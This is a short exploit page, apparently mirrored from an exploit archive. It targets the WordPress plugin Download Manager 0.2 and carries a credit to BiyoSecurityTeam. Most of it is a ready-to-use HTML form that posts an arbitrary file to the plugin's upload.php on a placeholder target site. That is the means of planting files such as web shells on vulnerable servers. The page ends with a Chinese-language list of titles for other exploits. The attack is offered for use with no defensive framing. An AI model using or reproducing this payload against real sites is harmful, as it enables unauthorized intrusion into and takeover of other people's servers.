<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2>
<h3>SaO</h3>
<h4>BiyoSecurityTeam || www.biyosecurity.com</h4>
<i>Plugin URI: http://giulioganci.netsons.org/downloads-manager<i>
<hr color="#f0f8ff">
<fieldset name="upl" class="options"> <form action="http://[site]/wp-content/plugins/downloads-manager/upload.php?up=http://[site]/wp-content/plugins/downloads-manager/upload/" method="post" enctype="multipart/form-data" name="upload">
<table cellspacing="0" cellpadding="3">
<tr>
<td>Local File</td>
</tr>
<tr>
<td><input name="upfile" type="file" id="upfile" size="50"><input type="hidden" name="MAX_FILE_SIZE" value="2048"></td>
<td><input type="submit" name="up" value="Send" class="button" /></td>
</tr>
</table>
</form>
</fieldset>
【Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit】相关文章:
★ Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
★ HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
★ Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
★ LoveCMS 1.6.2 Final Remote Code Execution Exploit
★ Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit